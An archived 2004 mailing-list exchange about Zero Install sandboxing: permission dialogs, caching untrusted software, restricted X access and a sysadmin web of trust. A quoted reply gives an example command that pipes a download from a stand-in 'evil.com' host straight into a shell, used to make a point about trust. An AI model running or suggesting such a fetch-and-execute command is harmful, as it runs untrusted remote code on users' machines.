General sandbox specs?

[Lars Hallberg]

Thomas Leonard wrote:

>On Fri, Mar 12, 2004 at 11:00:41PM +0100, Lars Hallberg wrote:
>  
>
>When it tries to do the action, a dialog box pops up to confirm. So, you'd
>just give the indexer full read-access to your filesystem the first time
>it tried to access a private file, if that's what you wanted.
>  
>
Might work! Then its the isu whit sharing the X dispay.

Ther need to be a way to make a 'restrikted' conection to the X server.

>>But if it's not [in the cache already], the download is so much overhead
>>so a litle more would not matter. Given the number of possably
>>interfaces, this is a strategic point to check if the file is trusted to
>>install. But then the check is only performed if the file is not cached.
>>Thats why i don't want to cach untrusted stuff.... but I might have got
>>it all wrong :-)
>>    
>>
>
>Yes, that is one way, but it's bad for sharing caches, and prevents you
>from just looking at a site, for example (without running anything).
>  
>
Hmm... if the index file tell what's dokumentation, and the deamon check 
the files white some magic so they actuly are dokumentation... Then it 
could alow acces from 'untrusted' sites.

>People do seem to worry a lot about nasty software getting cached, but it
>really makes little difference. Imagine a user who tries to run this:
>
>$ /uri/0install/evil.com/wipe-my-files
>
>Bad. But on the other hand, they could just as easily do:
>
>$ lynx -source http://evil.com | sh -
>  
>

Yeh, I might just be to new to the consept... but I think of the logical 
development of this... Take a OLE like fileformat.... You get a document 
by mail, fire up a viewer, the dokument contains an object with the 
viewer att /uri/0install/evil.com/...

Of, corse, the first viewer, if well written, can do the check and warn 
the user... but I still feel like I want, as a sysop, be able to 
somewhat controll what will be automaticly available att my boxes.

That web of trust can be pretty loos, when adding a line to my apt 
source list I give away root priviliges... whit zero install I give away 
only user privelige... but I still feel I need *some* web of trust :-) 
And possably a blacklist of untrust for known violitions.

But I subscribed to the 0install list now. This is only rellevant for a 
system runing zeroinstall itself, not att all for a sandbox, so it's 
going pretty OT i guess :-(

>>But doing the check att that point have it's own problems. Ther's realy 
>>no good way of knowing how to ask the user for permision - so I guess it 
>>can only fail if the file is not trusted :-(
>>    
>>
>
>We already pop up a dialog showing download progress (using D-BUS to
>communicate with the daemon), so that's not actually a problem.
>  
>

Think it is... If I ctrl-alt-F4 to a vc, and I miss a progressbar, it's 
a slight anoince. If it hangs waiting on a dialog it's a huge anoince :-(

Think failing is OK thou... It *is* untrusted stuff.... not part of the 
(any) distribution I run (have shosen to trust).

Some app that monitors the 0install log might be cool. I try to wach a 
move, it fails. The user notifikation tells me 0install have news. I 
click on them and get the message.

"strange codec is not alowed to be used (witch realy means cached) from 
untrusted.com."

And with an option to in the futer allow stuff from untrusted.com (if 
the sysadm have given me that power - probably the sane default fore a 
homesystem dist). If I allow that, I alow it for all users (slightly 
like installing).

I alow it and try to view the movie again... It works  :-)

/LaH